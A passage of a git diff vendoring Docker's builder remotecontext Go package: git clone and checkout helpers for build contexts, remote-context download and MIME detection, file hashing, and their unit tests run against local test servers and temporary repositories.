errors.Wrapf(err, "failed to init repo at %s: %s", root, out) + } + + // Add origin remote for compatibility with previous implementation that + // used "git clone" and also to make sure local refs are created for branches + if out, err := gitWithinDir(root, "remote", "add", "origin", repo.remote); err != nil { + return "", errors.Wrapf(err, "failed add origin repo at %s: %s", repo.remote, out) + } + + if output, err := gitWithinDir(root, fetch...); err != nil { + return "", errors.Wrapf(err, "error fetching: %s", output) + } + + checkoutDir, err = checkoutGit(root, repo.ref, repo.subdir) + if err != nil { + return "", err + } + + cmd := exec.Command("git", "submodule", "update", "--init", "--recursive", "--depth=1") + cmd.Dir = root + output, err := cmd.CombinedOutput() + if err != nil { + return "", errors.Wrapf(err, "error initializing submodules: %s", output) + } + + return checkoutDir, nil +} + +func parseRemoteURL(remoteURL string) (gitRepo, error) { + repo := gitRepo{} + + if !isGitTransport(remoteURL) { + remoteURL = "https://" + remoteURL + } + + var fragment string + if strings.HasPrefix(remoteURL, "git@") { + // git@.. 
is not an URL, so cannot be parsed as URL + parts := strings.SplitN(remoteURL, "#", 2) + + repo.remote = parts[0] + if len(parts) == 2 { + fragment = parts[1] + } + repo.ref, repo.subdir = getRefAndSubdir(fragment) + } else { + u, err := url.Parse(remoteURL) + if err != nil { + return repo, err + } + + repo.ref, repo.subdir = getRefAndSubdir(u.Fragment) + u.Fragment = "" + repo.remote = u.String() + } + return repo, nil +} + +func getRefAndSubdir(fragment string) (ref string, subdir string) { + refAndDir := strings.SplitN(fragment, ":", 2) + ref = "master" + if len(refAndDir[0]) != 0 { + ref = refAndDir[0] + } + if len(refAndDir) > 1 && len(refAndDir[1]) != 0 { + subdir = refAndDir[1] + } + return +} + +func fetchArgs(remoteURL string, ref string) []string { + args := []string{"fetch"} + + if supportsShallowClone(remoteURL) { + args = append(args, "--depth", "1") + } + + return append(args, "origin", ref) +} + +// Check if a given git URL supports a shallow git clone, +// i.e. it is a non-HTTP server or a smart HTTP server. +func supportsShallowClone(remoteURL string) bool { + if urlutil.IsURL(remoteURL) { + // Check if the HTTP server is smart + + // Smart servers must correctly respond to a query for the git-upload-pack service + serviceURL := remoteURL + "/info/refs?service=git-upload-pack" + + // Try a HEAD request and fallback to a Get request on error + res, err := http.Head(serviceURL) + if err != nil || res.StatusCode != http.StatusOK { + res, err = http.Get(serviceURL) + if err == nil { + res.Body.Close() + } + if err != nil || res.StatusCode != http.StatusOK { + // request failed + return false + } + } + + if res.Header.Get("Content-Type") != "application/x-git-upload-pack-advertisement" { + // Fallback, not a smart server + return false + } + return true + } + // Non-HTTP protocols always support shallow clones + return true +} + +func checkoutGit(root, ref, subdir string) (string, error) { + // Try checking out by ref name first. 
This will work on branches and sets + // .git/HEAD to the current branch name + if output, err := gitWithinDir(root, "checkout", ref); err != nil { + // If checking out by branch name fails check out the last fetched ref + if _, err2 := gitWithinDir(root, "checkout", "FETCH_HEAD"); err2 != nil { + return "", errors.Wrapf(err, "error checking out %s: %s", ref, output) + } + } + + if subdir != "" { + newCtx, err := symlink.FollowSymlinkInScope(filepath.Join(root, subdir), root) + if err != nil { + return "", errors.Wrapf(err, "error setting git context, %q not within git root", subdir) + } + + fi, err := os.Stat(newCtx) + if err != nil { + return "", err + } + if !fi.IsDir() { + return "", errors.Errorf("error setting git context, not a directory: %s", newCtx) + } + root = newCtx + } + + return root, nil +} + +func gitWithinDir(dir string, args ...string) ([]byte, error) { + a := []string{"--work-tree", dir, "--git-dir", filepath.Join(dir, ".git")} + return git(append(a, args...)...) +} + +func git(args ...string) ([]byte, error) { + return exec.Command("git", args...).CombinedOutput() +} + +// isGitTransport returns true if the provided str is a git transport by inspecting +// the prefix of the string for known protocols used in git. 
+func isGitTransport(str string) bool { + return urlutil.IsURL(str) || strings.HasPrefix(str, "git://") || strings.HasPrefix(str, "git@") +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils_test.go b/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils_test.go new file mode 100644 index 0000000000..8c39679081 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils_test.go @@ -0,0 +1,278 @@ +package git // import "github.com/docker/docker/builder/remotecontext/git" + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "net/url" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + "testing" + + "github.com/google/go-cmp/cmp" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestParseRemoteURL(t *testing.T) { + dir, err := parseRemoteURL("git://github.com/user/repo.git") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(gitRepo{"git://github.com/user/repo.git", "master", ""}, dir, cmpGitRepoOpt)) + + dir, err = parseRemoteURL("git://github.com/user/repo.git#mybranch:mydir/mysubdir/") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(gitRepo{"git://github.com/user/repo.git", "mybranch", "mydir/mysubdir/"}, dir, cmpGitRepoOpt)) + + dir, err = parseRemoteURL("https://github.com/user/repo.git") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(gitRepo{"https://github.com/user/repo.git", "master", ""}, dir, cmpGitRepoOpt)) + + dir, err = parseRemoteURL("https://github.com/user/repo.git#mybranch:mydir/mysubdir/") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(gitRepo{"https://github.com/user/repo.git", "mybranch", "mydir/mysubdir/"}, dir, cmpGitRepoOpt)) + + dir, err = parseRemoteURL("git@github.com:user/repo.git") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(gitRepo{"git@github.com:user/repo.git", "master", ""}, dir, cmpGitRepoOpt)) + + dir, err = 
parseRemoteURL("git@github.com:user/repo.git#mybranch:mydir/mysubdir/") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(gitRepo{"git@github.com:user/repo.git", "mybranch", "mydir/mysubdir/"}, dir, cmpGitRepoOpt)) +} + +var cmpGitRepoOpt = cmp.AllowUnexported(gitRepo{}) + +func TestCloneArgsSmartHttp(t *testing.T) { + mux := http.NewServeMux() + server := httptest.NewServer(mux) + serverURL, _ := url.Parse(server.URL) + + serverURL.Path = "/repo.git" + + mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) { + q := r.URL.Query().Get("service") + w.Header().Set("Content-Type", fmt.Sprintf("application/x-%s-advertisement", q)) + }) + + args := fetchArgs(serverURL.String(), "master") + exp := []string{"fetch", "--depth", "1", "origin", "master"} + assert.Check(t, is.DeepEqual(exp, args)) +} + +func TestCloneArgsDumbHttp(t *testing.T) { + mux := http.NewServeMux() + server := httptest.NewServer(mux) + serverURL, _ := url.Parse(server.URL) + + serverURL.Path = "/repo.git" + + mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "text/plain") + }) + + args := fetchArgs(serverURL.String(), "master") + exp := []string{"fetch", "origin", "master"} + assert.Check(t, is.DeepEqual(exp, args)) +} + +func TestCloneArgsGit(t *testing.T) { + args := fetchArgs("git://github.com/docker/docker", "master") + exp := []string{"fetch", "--depth", "1", "origin", "master"} + assert.Check(t, is.DeepEqual(exp, args)) +} + +func gitGetConfig(name string) string { + b, err := git([]string{"config", "--get", name}...) + if err != nil { + // since we are interested in empty or non empty string, + // we can safely ignore the err here. 
+ return "" + } + return strings.TrimSpace(string(b)) +} + +func TestCheckoutGit(t *testing.T) { + root, err := ioutil.TempDir("", "docker-build-git-checkout") + assert.NilError(t, err) + defer os.RemoveAll(root) + + autocrlf := gitGetConfig("core.autocrlf") + if !(autocrlf == "true" || autocrlf == "false" || + autocrlf == "input" || autocrlf == "") { + t.Logf("unknown core.autocrlf value: \"%s\"", autocrlf) + } + eol := "\n" + if autocrlf == "true" { + eol = "\r\n" + } + + gitDir := filepath.Join(root, "repo") + _, err = git("init", gitDir) + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "config", "user.email", "test@docker.com") + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "config", "user.name", "Docker test") + assert.NilError(t, err) + + err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch"), 0644) + assert.NilError(t, err) + + subDir := filepath.Join(gitDir, "subdir") + assert.NilError(t, os.Mkdir(subDir, 0755)) + + err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 5000"), 0644) + assert.NilError(t, err) + + if runtime.GOOS != "windows" { + if err = os.Symlink("../subdir", filepath.Join(gitDir, "parentlink")); err != nil { + t.Fatal(err) + } + + if err = os.Symlink("/subdir", filepath.Join(gitDir, "absolutelink")); err != nil { + t.Fatal(err) + } + } + + _, err = gitWithinDir(gitDir, "add", "-A") + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "commit", "-am", "First commit") + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "checkout", "-b", "test") + assert.NilError(t, err) + + err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 3000"), 0644) + assert.NilError(t, err) + + err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM busybox\nEXPOSE 5000"), 0644) + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "add", "-A") + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, 
"commit", "-am", "Branch commit") + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "checkout", "master") + assert.NilError(t, err) + + // set up submodule + subrepoDir := filepath.Join(root, "subrepo") + _, err = git("init", subrepoDir) + assert.NilError(t, err) + + _, err = gitWithinDir(subrepoDir, "config", "user.email", "test@docker.com") + assert.NilError(t, err) + + _, err = gitWithinDir(subrepoDir, "config", "user.name", "Docker test") + assert.NilError(t, err) + + err = ioutil.WriteFile(filepath.Join(subrepoDir, "subfile"), []byte("subcontents"), 0644) + assert.NilError(t, err) + + _, err = gitWithinDir(subrepoDir, "add", "-A") + assert.NilError(t, err) + + _, err = gitWithinDir(subrepoDir, "commit", "-am", "Subrepo initial") + assert.NilError(t, err) + + cmd := exec.Command("git", "submodule", "add", subrepoDir, "sub") // this command doesn't work with --work-tree + cmd.Dir = gitDir + assert.NilError(t, cmd.Run()) + + _, err = gitWithinDir(gitDir, "add", "-A") + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "commit", "-am", "With submodule") + assert.NilError(t, err) + + type singleCase struct { + frag string + exp string + fail bool + submodule bool + } + + cases := []singleCase{ + {"", "FROM scratch", false, true}, + {"master", "FROM scratch", false, true}, + {":subdir", "FROM scratch" + eol + "EXPOSE 5000", false, false}, + {":nosubdir", "", true, false}, // missing directory error + {":Dockerfile", "", true, false}, // not a directory error + {"master:nosubdir", "", true, false}, + {"master:subdir", "FROM scratch" + eol + "EXPOSE 5000", false, false}, + {"master:../subdir", "", true, false}, + {"test", "FROM scratch" + eol + "EXPOSE 3000", false, false}, + {"test:", "FROM scratch" + eol + "EXPOSE 3000", false, false}, + {"test:subdir", "FROM busybox" + eol + "EXPOSE 5000", false, false}, + } + + if runtime.GOOS != "windows" { + // Windows GIT (2.7.1 x64) does not support parentlink/absolutelink. 
Sample output below + // git --work-tree .\repo --git-dir .\repo\.git add -A + // error: readlink("absolutelink"): Function not implemented + // error: unable to index file absolutelink + // fatal: adding files failed + cases = append(cases, singleCase{frag: "master:absolutelink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false}) + cases = append(cases, singleCase{frag: "master:parentlink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false}) + } + + for _, c := range cases { + ref, subdir := getRefAndSubdir(c.frag) + r, err := cloneGitRepo(gitRepo{remote: gitDir, ref: ref, subdir: subdir}) + + if c.fail { + assert.Check(t, is.ErrorContains(err, "")) + continue + } + assert.NilError(t, err) + defer os.RemoveAll(r) + if c.submodule { + b, err := ioutil.ReadFile(filepath.Join(r, "sub/subfile")) + assert.NilError(t, err) + assert.Check(t, is.Equal("subcontents", string(b))) + } else { + _, err := os.Stat(filepath.Join(r, "sub/subfile")) + assert.Assert(t, is.ErrorContains(err, "")) + assert.Assert(t, os.IsNotExist(err)) + } + + b, err := ioutil.ReadFile(filepath.Join(r, "Dockerfile")) + assert.NilError(t, err) + assert.Check(t, is.Equal(c.exp, string(b))) + } +} + +func TestValidGitTransport(t *testing.T) { + gitUrls := []string{ + "git://github.com/docker/docker", + "git@github.com:docker/docker.git", + "git@bitbucket.org:atlassianlabs/atlassian-docker.git", + "https://github.com/docker/docker.git", + "http://github.com/docker/docker.git", + "http://github.com/docker/docker.git#branch", + "http://github.com/docker/docker.git#:dir", + } + incompleteGitUrls := []string{ + "github.com/docker/docker", + } + + for _, url := range gitUrls { + if !isGitTransport(url) { + t.Fatalf("%q should be detected as valid Git prefix", url) + } + } + + for _, url := range incompleteGitUrls { + if isGitTransport(url) { + t.Fatalf("%q should not be detected as valid Git prefix", url) + } + } +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/lazycontext.go 
b/vendor/github.com/docker/docker/builder/remotecontext/lazycontext.go new file mode 100644 index 0000000000..442cecad85 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/lazycontext.go @@ -0,0 +1,102 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "encoding/hex" + "os" + "strings" + + "github.com/docker/docker/builder" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/pools" + "github.com/pkg/errors" +) + +// NewLazySource creates a new LazyContext. LazyContext defines a hashed build +// context based on a root directory. Individual files are hashed first time +// they are asked. It is not safe to call methods of LazyContext concurrently. +func NewLazySource(root containerfs.ContainerFS) (builder.Source, error) { + return &lazySource{ + root: root, + sums: make(map[string]string), + }, nil +} + +type lazySource struct { + root containerfs.ContainerFS + sums map[string]string +} + +func (c *lazySource) Root() containerfs.ContainerFS { + return c.root +} + +func (c *lazySource) Close() error { + return nil +} + +func (c *lazySource) Hash(path string) (string, error) { + cleanPath, fullPath, err := normalize(path, c.root) + if err != nil { + return "", err + } + + relPath, err := Rel(c.root, fullPath) + if err != nil { + return "", errors.WithStack(convertPathError(err, cleanPath)) + } + + fi, err := os.Lstat(fullPath) + if err != nil { + // Backwards compatibility: a missing file returns a path as hash. + // This is reached in the case of a broken symlink. 
+ return relPath, nil + } + + sum, ok := c.sums[relPath] + if !ok { + sum, err = c.prepareHash(relPath, fi) + if err != nil { + return "", err + } + } + + return sum, nil +} + +func (c *lazySource) prepareHash(relPath string, fi os.FileInfo) (string, error) { + p := c.root.Join(c.root.Path(), relPath) + h, err := NewFileHash(p, relPath, fi) + if err != nil { + return "", errors.Wrapf(err, "failed to create hash for %s", relPath) + } + if fi.Mode().IsRegular() && fi.Size() > 0 { + f, err := c.root.Open(p) + if err != nil { + return "", errors.Wrapf(err, "failed to open %s", relPath) + } + defer f.Close() + if _, err := pools.Copy(h, f); err != nil { + return "", errors.Wrapf(err, "failed to copy file data for %s", relPath) + } + } + sum := hex.EncodeToString(h.Sum(nil)) + c.sums[relPath] = sum + return sum, nil +} + +// Rel makes a path relative to base path. Same as `filepath.Rel` but can also +// handle UUID paths in windows. +func Rel(basepath containerfs.ContainerFS, targpath string) (string, error) { + // filepath.Rel can't handle UUID paths in windows + if basepath.OS() == "windows" { + pfx := basepath.Path() + `\` + if strings.HasPrefix(targpath, pfx) { + p := strings.TrimPrefix(targpath, pfx) + if p == "" { + p = "." + } + return p, nil + } + } + return basepath.Rel(basepath.Path(), targpath) +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/mimetype.go b/vendor/github.com/docker/docker/builder/remotecontext/mimetype.go similarity index 63% rename from vendor/github.com/docker/docker/pkg/httputils/mimetype.go rename to vendor/github.com/docker/docker/builder/remotecontext/mimetype.go index d5cf34e4f2..e8a6210e9c 100644 --- a/vendor/github.com/docker/docker/pkg/httputils/mimetype.go +++ b/vendor/github.com/docker/docker/builder/remotecontext/mimetype.go @@ -1,30 +1,27 @@ -package httputils +package remotecontext // import "github.com/docker/docker/builder/remotecontext" import ( "mime" "net/http" ) -// MimeTypes stores the MIME content type. 
-var MimeTypes = struct { +// mimeTypes stores the MIME content type. +var mimeTypes = struct { TextPlain string - Tar string OctetStream string -}{"text/plain", "application/tar", "application/octet-stream"} +}{"text/plain", "application/octet-stream"} -// DetectContentType returns a best guess representation of the MIME +// detectContentType returns a best guess representation of the MIME // content type for the bytes at c. The value detected by // http.DetectContentType is guaranteed not be nil, defaulting to // application/octet-stream when a better guess cannot be made. The // result of this detection is then run through mime.ParseMediaType() // which separates the actual MIME string from any parameters. -func DetectContentType(c []byte) (string, map[string]string, error) { - +func detectContentType(c []byte) (string, map[string]string, error) { ct := http.DetectContentType(c) contentType, args, err := mime.ParseMediaType(ct) if err != nil { return "", nil, err } - return contentType, args, nil } diff --git a/vendor/github.com/docker/docker/builder/remotecontext/mimetype_test.go b/vendor/github.com/docker/docker/builder/remotecontext/mimetype_test.go new file mode 100644 index 0000000000..df9c378770 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/mimetype_test.go @@ -0,0 +1,16 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDetectContentType(t *testing.T) { + input := []byte("That is just a plain text") + + contentType, _, err := detectContentType(input) + assert.NilError(t, err) + assert.Check(t, is.Equal("text/plain", contentType)) +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/remote.go b/vendor/github.com/docker/docker/builder/remotecontext/remote.go new file mode 100644 index 0000000000..1fb80549b8 --- /dev/null +++ 
b/vendor/github.com/docker/docker/builder/remotecontext/remote.go @@ -0,0 +1,127 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "bytes" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "net/url" + "regexp" + + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/ioutils" + "github.com/pkg/errors" +) + +// When downloading remote contexts, limit the amount (in bytes) +// to be read from the response body in order to detect its Content-Type +const maxPreambleLength = 100 + +const acceptableRemoteMIME = `(?:application/(?:(?:x\-)?tar|octet\-stream|((?:x\-)?(?:gzip|bzip2?|xz)))|(?:text/plain))` + +var mimeRe = regexp.MustCompile(acceptableRemoteMIME) + +// downloadRemote context from a url and returns it, along with the parsed content type +func downloadRemote(remoteURL string) (string, io.ReadCloser, error) { + response, err := GetWithStatusError(remoteURL) + if err != nil { + return "", nil, errors.Wrapf(err, "error downloading remote context %s", remoteURL) + } + + contentType, contextReader, err := inspectResponse( + response.Header.Get("Content-Type"), + response.Body, + response.ContentLength) + if err != nil { + response.Body.Close() + return "", nil, errors.Wrapf(err, "error detecting content type for remote %s", remoteURL) + } + + return contentType, ioutils.NewReadCloserWrapper(contextReader, response.Body.Close), nil +} + +// GetWithStatusError does an http.Get() and returns an error if the +// status code is 4xx or 5xx. 
+func GetWithStatusError(address string) (resp *http.Response, err error) { + if resp, err = http.Get(address); err != nil { + if uerr, ok := err.(*url.Error); ok { + if derr, ok := uerr.Err.(*net.DNSError); ok && !derr.IsTimeout { + return nil, errdefs.NotFound(err) + } + } + return nil, errdefs.System(err) + } + if resp.StatusCode < 400 { + return resp, nil + } + msg := fmt.Sprintf("failed to GET %s with status %s", address, resp.Status) + body, err := ioutil.ReadAll(resp.Body) + resp.Body.Close() + if err != nil { + return nil, errdefs.System(errors.New(msg + ": error reading body")) + } + + msg += ": " + string(bytes.TrimSpace(body)) + switch resp.StatusCode { + case http.StatusNotFound: + return nil, errdefs.NotFound(errors.New(msg)) + case http.StatusBadRequest: + return nil, errdefs.InvalidParameter(errors.New(msg)) + case http.StatusUnauthorized: + return nil, errdefs.Unauthorized(errors.New(msg)) + case http.StatusForbidden: + return nil, errdefs.Forbidden(errors.New(msg)) + } + return nil, errdefs.Unknown(errors.New(msg)) +} + +// inspectResponse looks into the http response data at r to determine whether its +// content-type is on the list of acceptable content types for remote build contexts. +// This function returns: +// - a string representation of the detected content-type +// - an io.Reader for the response body +// - an error value which will be non-nil either when something goes wrong while +// reading bytes from r or when the detected content-type is not acceptable. 
+func inspectResponse(ct string, r io.Reader, clen int64) (string, io.Reader, error) { + plen := clen + if plen <= 0 || plen > maxPreambleLength { + plen = maxPreambleLength + } + + preamble := make([]byte, plen) + rlen, err := r.Read(preamble) + if rlen == 0 { + return ct, r, errors.New("empty response") + } + if err != nil && err != io.EOF { + return ct, r, err + } + + preambleR := bytes.NewReader(preamble[:rlen]) + bodyReader := io.MultiReader(preambleR, r) + // Some web servers will use application/octet-stream as the default + // content type for files without an extension (e.g. 'Dockerfile') + // so if we receive this value we better check for text content + contentType := ct + if len(ct) == 0 || ct == mimeTypes.OctetStream { + contentType, _, err = detectContentType(preamble) + if err != nil { + return contentType, bodyReader, err + } + } + + contentType = selectAcceptableMIME(contentType) + var cterr error + if len(contentType) == 0 { + cterr = fmt.Errorf("unsupported Content-Type %q", ct) + contentType = ct + } + + return contentType, bodyReader, cterr +} + +func selectAcceptableMIME(ct string) string { + return mimeRe.FindString(ct) +} diff --git a/vendor/github.com/docker/docker/builder/remote_test.go b/vendor/github.com/docker/docker/builder/remotecontext/remote_test.go similarity index 62% rename from vendor/github.com/docker/docker/builder/remote_test.go rename to vendor/github.com/docker/docker/builder/remotecontext/remote_test.go index 691a084761..a0101f7493 100644 --- a/vendor/github.com/docker/docker/builder/remote_test.go +++ b/vendor/github.com/docker/docker/builder/remotecontext/remote_test.go @@ -1,4 +1,4 @@ -package builder +package remotecontext // import "github.com/docker/docker/builder/remotecontext" import ( "bytes" @@ -9,8 +9,10 @@ import ( "net/url" "testing" - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/builder" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + 
"gotest.tools/fs" ) var binaryContext = []byte{0xFD, 0x37, 0x7A, 0x58, 0x5A, 0x00} //xz magic @@ -53,7 +55,7 @@ func TestInspectEmptyResponse(t *testing.T) { br := ioutil.NopCloser(bytes.NewReader([]byte(""))) contentType, bReader, err := inspectResponse(ct, br, 0) if err == nil { - t.Fatalf("Should have generated an error for an empty response") + t.Fatal("Should have generated an error for an empty response") } if contentType != "application/octet-stream" { t.Fatalf("Content type should be 'application/octet-stream' but is %q", contentType) @@ -151,63 +153,90 @@ func TestInspectResponseEmptyContentType(t *testing.T) { } } -func TestMakeRemoteContext(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() +func TestUnknownContentLength(t *testing.T) { + content := []byte(dockerfileContents) + ct := "text/plain" + br := ioutil.NopCloser(bytes.NewReader(content)) + contentType, bReader, err := inspectResponse(ct, br, -1) + if err != nil { + t.Fatal(err) + } + if contentType != "text/plain" { + t.Fatalf("Content type should be 'text/plain' but is %q", contentType) + } + body, err := ioutil.ReadAll(bReader) + if err != nil { + t.Fatal(err) + } + if string(body) != dockerfileContents { + t.Fatalf("Corrupted response body %s", body) + } +} - createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) +func TestDownloadRemote(t *testing.T) { + contextDir := fs.NewDir(t, "test-builder-download-remote", + fs.WithFile(builder.DefaultDockerfileName, dockerfileContents)) + defer contextDir.Remove() mux := http.NewServeMux() server := httptest.NewServer(mux) serverURL, _ := url.Parse(server.URL) - serverURL.Path = "/" + DefaultDockerfileName + serverURL.Path = "/" + builder.DefaultDockerfileName remoteURL := serverURL.String() - mux.Handle("/", http.FileServer(http.Dir(contextDir))) + mux.Handle("/", http.FileServer(http.Dir(contextDir.Path()))) - remoteContext, err := MakeRemoteContext(remoteURL, 
map[string]func(io.ReadCloser) (io.ReadCloser, error){ - httputils.MimeTypes.TextPlain: func(rc io.ReadCloser) (io.ReadCloser, error) { - dockerfile, err := ioutil.ReadAll(rc) - if err != nil { - return nil, err - } + contentType, content, err := downloadRemote(remoteURL) + assert.NilError(t, err) - r, err := archive.Generate(DefaultDockerfileName, string(dockerfile)) - if err != nil { - return nil, err - } - return ioutil.NopCloser(r), nil - }, - }) - - if err != nil { - t.Fatalf("Error when executing DetectContextFromRemoteURL: %s", err) - } - - if remoteContext == nil { - t.Fatalf("Remote context should not be nil") - } - - tarSumCtx, ok := remoteContext.(*tarSumContext) - - if !ok { - t.Fatalf("Cast error, remote context should be casted to tarSumContext") - } - - fileInfoSums := tarSumCtx.sums + assert.Check(t, is.Equal(mimeTypes.TextPlain, contentType)) + raw, err := ioutil.ReadAll(content) + assert.NilError(t, err) + assert.Check(t, is.Equal(dockerfileContents, string(raw))) +} - if fileInfoSums.Len() != 1 { - t.Fatalf("Size of file info sums should be 1, got: %d", fileInfoSums.Len()) +func TestGetWithStatusError(t *testing.T) { + var testcases = []struct { + err error + statusCode int + expectedErr string + expectedBody string + }{ + { + statusCode: 200, + expectedBody: "THE BODY", + }, + { + statusCode: 400, + expectedErr: "with status 400 Bad Request: broke", + expectedBody: "broke", + }, } - - fileInfo := fileInfoSums.GetFile(DefaultDockerfileName) - - if fileInfo == nil { - t.Fatalf("There should be file named %s in fileInfoSums", DefaultDockerfileName) + for _, testcase := range testcases { + ts := httptest.NewServer( + http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + buffer := bytes.NewBufferString(testcase.expectedBody) + w.WriteHeader(testcase.statusCode) + w.Write(buffer.Bytes()) + }), + ) + defer ts.Close() + response, err := GetWithStatusError(ts.URL) + + if testcase.expectedErr == "" { + assert.NilError(t, err) + + body, err := 
readBody(response.Body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(body), testcase.expectedBody)) + } else { + assert.Check(t, is.ErrorContains(err, testcase.expectedErr)) + } } +} - if fileInfo.Pos() != 0 { - t.Fatalf("File %s should have position 0, got %d", DefaultDockerfileName, fileInfo.Pos()) - } +func readBody(b io.ReadCloser) ([]byte, error) { + defer b.Close() + return ioutil.ReadAll(b) } diff --git a/vendor/github.com/docker/docker/builder/remotecontext/tarsum.go b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.go new file mode 100644 index 0000000000..b809cfb78b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.go @@ -0,0 +1,157 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "os" + "sync" + + "github.com/docker/docker/pkg/containerfs" + iradix "github.com/hashicorp/go-immutable-radix" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/tonistiigi/fsutil" +) + +type hashed interface { + Digest() digest.Digest +} + +// CachableSource is a source that contains cache records for its contents +type CachableSource struct { + mu sync.Mutex + root containerfs.ContainerFS + tree *iradix.Tree + txn *iradix.Txn +} + +// NewCachableSource creates new CachableSource +func NewCachableSource(root string) *CachableSource { + ts := &CachableSource{ + tree: iradix.New(), + root: containerfs.NewLocalContainerFS(root), + } + return ts +} + +// MarshalBinary marshals current cache information to a byte array +func (cs *CachableSource) MarshalBinary() ([]byte, error) { + b := TarsumBackup{Hashes: make(map[string]string)} + root := cs.getRoot() + root.Walk(func(k []byte, v interface{}) bool { + b.Hashes[string(k)] = v.(*fileInfo).sum + return false + }) + return b.Marshal() +} + +// UnmarshalBinary decodes cache information for presented byte array +func (cs *CachableSource) UnmarshalBinary(data []byte) error { + var b TarsumBackup + 
if err := b.Unmarshal(data); err != nil { + return err + } + txn := iradix.New().Txn() + for p, v := range b.Hashes { + txn.Insert([]byte(p), &fileInfo{sum: v}) + } + cs.mu.Lock() + defer cs.mu.Unlock() + cs.tree = txn.Commit() + return nil +} + +// Scan rescans the cache information from the file system +func (cs *CachableSource) Scan() error { + lc, err := NewLazySource(cs.root) + if err != nil { + return err + } + txn := iradix.New().Txn() + err = cs.root.Walk(cs.root.Path(), func(path string, info os.FileInfo, err error) error { + if err != nil { + return errors.Wrapf(err, "failed to walk %s", path) + } + rel, err := Rel(cs.root, path) + if err != nil { + return err + } + h, err := lc.Hash(rel) + if err != nil { + return err + } + txn.Insert([]byte(rel), &fileInfo{sum: h}) + return nil + }) + if err != nil { + return err + } + cs.mu.Lock() + defer cs.mu.Unlock() + cs.tree = txn.Commit() + return nil +} + +// HandleChange notifies the source about a modification operation +func (cs *CachableSource) HandleChange(kind fsutil.ChangeKind, p string, fi os.FileInfo, err error) (retErr error) { + cs.mu.Lock() + if cs.txn == nil { + cs.txn = cs.tree.Txn() + } + if kind == fsutil.ChangeKindDelete { + cs.txn.Delete([]byte(p)) + cs.mu.Unlock() + return + } + + h, ok := fi.(hashed) + if !ok { + cs.mu.Unlock() + return errors.Errorf("invalid fileinfo: %s", p) + } + + hfi := &fileInfo{ + sum: h.Digest().Hex(), + } + cs.txn.Insert([]byte(p), hfi) + cs.mu.Unlock() + return nil +} + +func (cs *CachableSource) getRoot() *iradix.Node { + cs.mu.Lock() + if cs.txn != nil { + cs.tree = cs.txn.Commit() + cs.txn = nil + } + t := cs.tree + cs.mu.Unlock() + return t.Root() +} + +// Close closes the source +func (cs *CachableSource) Close() error { + return nil +} + +// Hash returns a hash for a single file in the source +func (cs *CachableSource) Hash(path string) (string, error) { + n := cs.getRoot() + // TODO: check this for symlinks + v, ok := n.Get([]byte(path)) + if !ok { + return 
